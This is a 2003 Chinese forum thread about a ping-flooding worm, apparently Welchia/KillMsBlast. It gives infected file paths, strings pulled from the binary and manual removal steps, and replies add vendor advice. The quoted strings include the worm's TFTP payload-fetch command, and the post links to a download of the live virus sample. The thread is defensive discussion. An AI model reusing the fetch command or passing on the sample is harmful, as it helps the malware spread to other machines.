9,506
社区成员
发帖
与我相关
我的任务
分享近来有很多朋友都反映,机器被狂ping,请教各位大虾,是否为冲击波后遗症,亦或为其他病毒?
近来有很多朋友都反映,机器被狂ping,请教各位大虾,是否为冲击波后遗症,亦或为其他病毒?
ping的机器多数为同一网段的机器,以下内容来自金山,不知是否与此有关
如果大家在自己 的system32 目录里的WINS目录里发现DLLHOST.EXE 和SVCHOST.EXE那么你肯定中毒了。。请自己在启动里删除。。并且删除这2个文件。。传染比较快。。希望大家安装防护墙,,这是中国人自己编译的病毒
DLLHOST.EXE里面有这样的话!
=========== I love my wife & baby ~~~ Welcome Chian~~~ Notice: 2004 will remove myself~~ sorry zhongli~~~=========== wins http://download.microsoft.com/download/6/9...980-x86-KOR.exe ; http://download.microsoft.com/download/5/8...980-x86-CHT.exe ; http://download.microsoft.com/download/2/8...980-x86-CHS.exe ; http://download.microsoft.com/download/0/1...980-x86-ENU.exe ; http://download.microsoft.com/download/e/3...980-x86-KOR.exe ; http://download.microsoft.com/download/2/3...980-x86-CHT.exe ; http://download.microsoft.com/download/a/a...980-x86-CHS.exe ; http://download.microsoft.com/download/9/8...980-x86-ENU.exe ; tftp -i %s get svchost.exe wins\SVCHOST.EXE
如果正常,我就不是人了。。哈哈。。。这2个文件在WINS目录里。。
这决对不是玩笑!!! 我是玩HACK的。。这文件我SNIFF过。。反编译过。。。我是黑客圈里叫[D]KING
如果有什么问题,,,你可以说
说清楚..这2个文件肯定又会给网络安全打一针强心剂!!!!
如果是XP系统,那么这文件应该是在*:\WINDOWS\SYSTEM32\WINS\里
如果是NT系统..比如2000.那么就应该是在*:\winnt\system32\wins\里
这2个文件大家想研究可以在这里下
http://hy88.nease.net/pingvirus.rar
传染是利用TFTP上传的,,如果大家用不上这东东。完全可以删除TFTP.EXE
正常的SVCHOST.EXE是在SYSTEM32目录里...这个2个文件决对不正常,希望大家警惕
如果你的防护墙被PING..那么你那里有一定有机器中了!!
这东西只攻击PING的通的计算机..希望大家安装防护墙!!!设置不允许被PING
!!下面是解决方法 !!!!!下面是解决方法!!!
停止这2个系统服务 打开控制面板 然后打开管理工具 打开 服务
看到这2个服务就停止他们
Network connections Sharing
WINS Client
然后到WINS目录里删除这2个文件。。安装防护墙
修改人 dking - 2003年08月18日18:50
FROM 金山毒霸讨论区
http://bbs.kingsoft.net/index.php?act=ST&f=3&t=227591&s=2c7eca8f1cfff70fa592be97340215cf
ping的机器多数为同一网段的机器,以下内容来自金山,不知是否与此有关
如果大家在自己 的system32 目录里的WINS目录里发现DLLHOST.EXE 和SVCHOST.EXE那么你肯定中毒了。。请自己在启动里删除。。并且删除这2个文件。。传染比较快。。希望大家安装防护墙,,这是中国人自己编译的病毒
DLLHOST.EXE里面有这样的话!
=========== I love my wife & baby ~~~ Welcome Chian~~~ Notice: 2004 will remove myself~~ sorry zhongli~~~=========== wins http://download.microsoft.com/download/6/9...980-x86-KOR.exe ; http://download.microsoft.com/download/5/8...980-x86-CHT.exe ; http://download.microsoft.com/download/2/8...980-x86-CHS.exe ; http://download.microsoft.com/download/0/1...980-x86-ENU.exe ; http://download.microsoft.com/download/e/3...980-x86-KOR.exe ; http://download.microsoft.com/download/2/3...980-x86-CHT.exe ; http://download.microsoft.com/download/a/a...980-x86-CHS.exe ; http://download.microsoft.com/download/9/8...980-x86-ENU.exe ; tftp -i %s get svchost.exe wins\SVCHOST.EXE
如果正常,我就不是人了。。哈哈。。。这2个文件在WINS目录里。。
这决对不是玩笑!!! 我是玩HACK的。。这文件我SNIFF过。。反编译过。。。我是黑客圈里叫[D]KING
如果有什么问题,,,你可以说
说清楚..这2个文件肯定又会给网络安全打一针强心剂!!!!
如果是XP系统,那么这文件应该是在*:\WINDOWS\SYSTEM32\WINS\里
如果是NT系统..比如2000.那么就应该是在*:\winnt\system32\wins\里
这2个文件大家想研究可以在这里下
http://hy88.nease.net/pingvirus.rar
传染是利用TFTP上传的,,如果大家用不上这东东。完全可以删除TFTP.EXE
正常的SVCHOST.EXE是在SYSTEM32目录里...这个2个文件决对不正常,希望大家警惕
如果你的防护墙被PING..那么你那里有一定有机器中了!!
这东西只攻击PING的通的计算机..希望大家安装防护墙!!!设置不允许被PING
!!下面是解决方法 !!!!!下面是解决方法!!!
停止这2个系统服务 打开控制面板 然后打开管理工具 打开 服务
看到这2个服务就停止他们
Network connections Sharing
WINS Client
然后到WINS目录里删除这2个文件。。安装防护墙
修改人 dking - 2003年08月18日18:50
FROM 金山毒霸讨论区
http://bbs.kingsoft.net/index.php?act=ST&f=3&t=227591&s=2c7eca8f1cfff70fa592be97340215cf
...全文
请发表友善的回复…
发表回复
lele2002 2003-08-20
- 打赏
- 举报
查一下机器里是否有上述两个文件,还要注意一下文件所在路径,有官方文件已经证实这是病毒。
冲击波克星 Worm.KillMsBlast
此蠕虫主要是通过RPC漏洞发起攻击,复制自身。但与前几例RPC蠕虫有着明显的不同之处,首先在于这个蠕虫侵入系统之后首先检测系统是否已经感染了“冲击波”病毒,如果感染了“冲击波”病毒,“冲击波克星”首先会将系统中的“冲击波”病毒清除的干干净净,并会尝试从微软网站上下载RPC漏洞补丁程序,将受感染的系统打上补丁。并随之开启开启上百个线程疯狂探测IP地址,如果ping通目标ip地址,就尝试通过RPC漏洞快速传播自己,消耗大量CPU和网络资源,并且有可能会导致系统死机。
如果没有那两个文件而只是不停地被别人ping,不代表自己就中毒了,那是因为别的机子中毒了在不停地向外发送ping命令,只要装好防火墙不必惊慌。
如果中毒了,尽快下载最新病毒库,根据官方文件来杀毒。
这是我今天看了好多帖子才知道的,希望能帮到你。
另附金山公司解决方案一则:http://www.duba.net/c/2003/08/19/89860.shtml
冲击波克星 Worm.KillMsBlast
此蠕虫主要是通过RPC漏洞发起攻击,复制自身。但与前几例RPC蠕虫有着明显的不同之处,首先在于这个蠕虫侵入系统之后首先检测系统是否已经感染了“冲击波”病毒,如果感染了“冲击波”病毒,“冲击波克星”首先会将系统中的“冲击波”病毒清除的干干净净,并会尝试从微软网站上下载RPC漏洞补丁程序,将受感染的系统打上补丁。并随之开启开启上百个线程疯狂探测IP地址,如果ping通目标ip地址,就尝试通过RPC漏洞快速传播自己,消耗大量CPU和网络资源,并且有可能会导致系统死机。
如果没有那两个文件而只是不停地被别人ping,不代表自己就中毒了,那是因为别的机子中毒了在不停地向外发送ping命令,只要装好防火墙不必惊慌。
如果中毒了,尽快下载最新病毒库,根据官方文件来杀毒。
这是我今天看了好多帖子才知道的,希望能帮到你。
另附金山公司解决方案一则:http://www.duba.net/c/2003/08/19/89860.shtml
ccbzh 2003-08-20
- 打赏
- 举报
我从安全模式启动把它们干掉,然后在正常模式用优化大师清理注册表,重启动运行暂时没事。
jy2004 2003-08-19
- 打赏
- 举报
典型病毒!!!
wwpgo 2003-08-19
- 打赏
- 举报
http://www.duba.net/c/2003/08/18/89650.shtml
去看看
一种新的病毒~~
去看看
一种新的病毒~~
philipsslg 2003-08-19
- 打赏
- 举报
我也两天被人狂ping不止,好像又没中毒,这是郁闷啊
adan520 2003-08-19
- 打赏
- 举报
可能是病毒。。我的机器也老是这样
回炉重造,学习编程中。。。 2003-08-19
- 打赏
- 举报
干脆装上防火墙禁止别人ping自己
alexdyong 2003-08-19
- 打赏
- 举报
中了这个病毒后会有什么症状,对机器有什么影响~??
